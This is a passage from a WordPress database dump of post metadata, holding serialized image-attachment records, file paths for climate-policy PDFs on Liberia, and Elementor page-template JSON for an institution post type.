ype\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:26:\"Climate-Change-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:26:\"Climate-Change-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:26:\"Climate-Change-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:26:\"Climate-Change-518x450.png\";s:5:\"width\";i:518;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-l\";a:4:{s:4:\"file\";s:26:\"Climate-Change-518x650.png\";s:5:\"width\";i:518;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:26:\"Climate-Change-518x640.png\";s:5:\"width\";i:518;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"kava-thumb-justify-2\";a:4:{s:4:\"file\";s:26:\"Climate-Change-518x640.png\";s:5:\"width\";i:518;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27635,4015,'_wp_attached_file','2021/08/2012_IUCN_Climate-Change-Gender-Action-Plan-Liberia.pdf'),(27648,4017,'_wp_attached_file','2021/08/WCF.png'),(27649,4017,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:522;s:6:\"height\";i:664;s:4:\"file\";s:15:\"2021/08/WCF.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"WCF-236x300.png\";s:5:\"width\";i:236;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"WCF-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"WCF-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:14:\"WCF-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:15:\"WCF-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:15:\"WCF-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:15:\"WCF-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:15:\"WCF-522x450.png\";s:5:\"width\";i:522;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-l\";a:4:{s:4:\"file\";s:15:\"WCF-522x650.png\";s:5:\"width\";i:522;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:15:\"WCF-522x640.png\";s:5:\"width\";i:522;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"kava-thumb-justify-2\";a:4:{s:4:\"file\";s:15:\"WCF-522x640.png\";s:5:\"width\";i:522;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27650,4018,'_wp_attached_file','2021/08/2014_gvl_report_.pdf'),(27663,4020,'_wp_attached_file','2021/08/National-Policy.png'),(27664,4020,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:543;s:6:\"height\";i:736;s:4:\"file\";s:27:\"2021/08/National-Policy.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"National-Policy-221x300.png\";s:5:\"width\";i:221;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"National-Policy-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:27:\"National-Policy-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:26:\"National-Policy-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:27:\"National-Policy-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:27:\"National-Policy-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:27:\"National-Policy-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:27:\"National-Policy-543x450.png\";s:5:\"width\";i:543;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-l\";a:4:{s:4:\"file\";s:27:\"National-Policy-543x650.png\";s:5:\"width\";i:543;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:27:\"National-Policy-543x640.png\";s:5:\"width\";i:543;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"kava-thumb-justify-2\";a:4:{s:4:\"file\";s:27:\"National-Policy-543x640.png\";s:5:\"width\";i:543;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27665,4021,'_wp_attached_file','2021/08/2018-UNDP_lr_National-Policy-and-Response-Strategy-on-Climate-Change-1.pdf'),(27673,4022,'_wp_attached_file','2021/08/National-Policy-1.png'),(27674,4022,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:543;s:6:\"height\";i:736;s:4:\"file\";s:29:\"2021/08/National-Policy-1.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"National-Policy-1-221x300.png\";s:5:\"width\";i:221;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"National-Policy-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:29:\"National-Policy-1-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:28:\"National-Policy-1-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:29:\"National-Policy-1-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:29:\"National-Policy-1-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:29:\"National-Policy-1-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:29:\"National-Policy-1-543x450.png\";s:5:\"width\";i:543;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-l\";a:4:{s:4:\"file\";s:29:\"National-Policy-1-543x650.png\";s:5:\"width\";i:543;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:29:\"National-Policy-1-543x640.png\";s:5:\"width\";i:543;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"kava-thumb-justify-2\";a:4:{s:4:\"file\";s:29:\"National-Policy-1-543x640.png\";s:5:\"width\";i:543;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27675,4023,'_wp_attached_file','2021/08/2018-UNDP_lr_National-Policy-and-Response-Strategy-on-Climate-Change-1-1.pdf'),(27682,1608,'_last_editor_used_jetpack','classic-editor'),(27683,4024,'_wp_attached_file','2020/12/Untitled.png'),(27684,4024,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:20:\"2020/12/Untitled.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"Untitled-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"Untitled-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"Untitled-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:19:\"Untitled-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:20:\"Untitled-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:20:\"Untitled-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27685,3275,'_pods_file_type_image','a:1:{i:0;i:4024;}'),(27688,3226,'_last_editor_used_jetpack','classic-editor'),(27700,4026,'_wp_attached_file','2020/11/Untitled2.png'),(27701,4026,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:21:\"2020/11/Untitled2.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"Untitled2-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"Untitled2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"Untitled2-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:20:\"Untitled2-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:21:\"Untitled2-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:21:\"Untitled2-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27702,3226,'_pods_file_type_image','a:1:{i:0;i:4026;}'),(27705,4027,'_elementor_edit_mode','builder'),(27706,4027,'_elementor_template_type','single-post'),(27707,4027,'_elementor_version','3.4.0'),(27708,4027,'_elementor_pro_version','3.3.6'),(27709,4027,'_wp_page_template','default'),(27710,4027,'_elementor_data','[{\"id\":\"12002fa\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"090d30d\"}],\"background_background\":\"classic\"},\"elements\":[{\"id\":\"c8cd4ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b15ea6e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"d4bec19\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"cc70076\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4aa672a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":74.269000000000005456968210637569427490234375,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9099e3a\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"44d8a81\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\"},\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":true},{\"id\":\"f1c39ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":25.675999999999998379962562466971576213836669921875,\"background_background\":\"classic\",\"background_color\":\"#FFFFFFA8\"},\"elements\":[{\"id\":\"6e47c97\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"204b950\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainstitution_logo%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"7380147\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"},\"image_size\":\"thumbnail\",\"link\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"26ac35b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Existing System\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47c6b38\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_data_menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"fas fa-plus\",\"library\":\"fa-solid\"},\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#0A3C11\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd87be8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4eccdfc\"}],\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"e3d1e6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ec0a7c8\",\"elType\":\"widget\",\"settings\":{\"show_post_title\":\"yes\",\"excerpt_trimmed_ending\":\"...\",\"prev_text\":\"Older posts\",\"next_text\":\"Newer posts\",\"items_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-blog-posts-navigation\"}],\"isInner\":false}],\"isInner\":false}]'),(27712,4027,'_elementor_conditions','a:4:{i:0;s:28:\"include/singular/institution\";i:1;s:41:\"include/singular/in_institutions_category\";i:2;s:50:\"include/singular/in_institutions_category_children\";i:3;s:38:\"include/singular/institution_by_author\";}'),(27713,4027,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:18:\"single/institution\";s:10:\"preview_id\";s:4:\"1582\";}'),(27715,3109,'_last_editor_used_jetpack','classic-editor'),(27716,4028,'_elementor_edit_mode','builder'),(27717,4028,'_elementor_template_type','single-post'),(27718,4028,'_elementor_version','3.4.0'),(27719,4028,'_elementor_pro_version','3.3.6'),(27720,4028,'_wp_page_template','default'),(27721,4028,'_elementor_data','[{\"id\":\"12002fa\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"090d30d\"}],\"background_background\":\"classic\"},\"elements\":[{\"id\":\"c8cd4ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b15ea6e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"d4bec19\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"cc70076\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4aa672a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":74.269000000000005456968210637569427490234375,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9099e3a\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"44d8a81\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\"},\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":true},{\"id\":\"f1c39ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":25.675999999999998379962562466971576213836669921875,\"background_background\":\"classic\",\"background_color\":\"#FFFFFFA8\"},\"elements\":[{\"id\":\"6e47c97\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"204b950\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainstitution_logo%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"7380147\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"},\"image_size\":\"thumbnail\",\"link\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8da2f7a\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_links\"},\"elements\":[],\"widgetType\":\"nav-menu\"},{\"id\":\"26ac35b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Existing System\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47c6b38\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_data_menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"fas fa-plus\",\"library\":\"fa-solid\"},\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#0A3C11\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd87be8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4eccdfc\"}],\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"e3d1e6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ec0a7c8\",\"elType\":\"widget\",\"settings\":{\"show_post_title\":\"yes\",\"excerpt_trimmed_ending\":\"...\",\"prev_text\":\"Older posts\",\"next_text\":\"Newer posts\",\"items_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-blog-posts-navigation\"}],\"isInner\":false}],\"isInner\":false}]'),(27723,4028,'_elementor_conditions','a:4:{i:0;s:28:\"include/singular/institution\";i:1;s:41:\"include/singular/in_institutions_category\";i:2;s:50:\"include/singular/in_institutions_category_children\";i:3;s:38:\"include/singular/institution_by_author\";}'),(27724,4028,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:18:\"single/institution\";s:10:\"preview_id\";s:4:\"1582\";}'),(27726,4029,'_elementor_edit_mode','builder'),(27727,4029,'_elementor_template_type','single-post'),(27728,4029,'_elementor_version','3.4.0'),(27729,4029,'_elementor_pro_version','3.3.6'),(27730,4029,'_wp_page_template','default'),(27731,4029,'_elementor_data','[{\"id\":\"12002fa\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"090d30d\"}],\"background_background\":\"classic\"},\"elements\":[{\"id\":\"c8cd4ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b15ea6e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"d4bec19\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"cc70076\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4aa672a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":74.269000000000005456968210637569427490234375,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9099e3a\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" 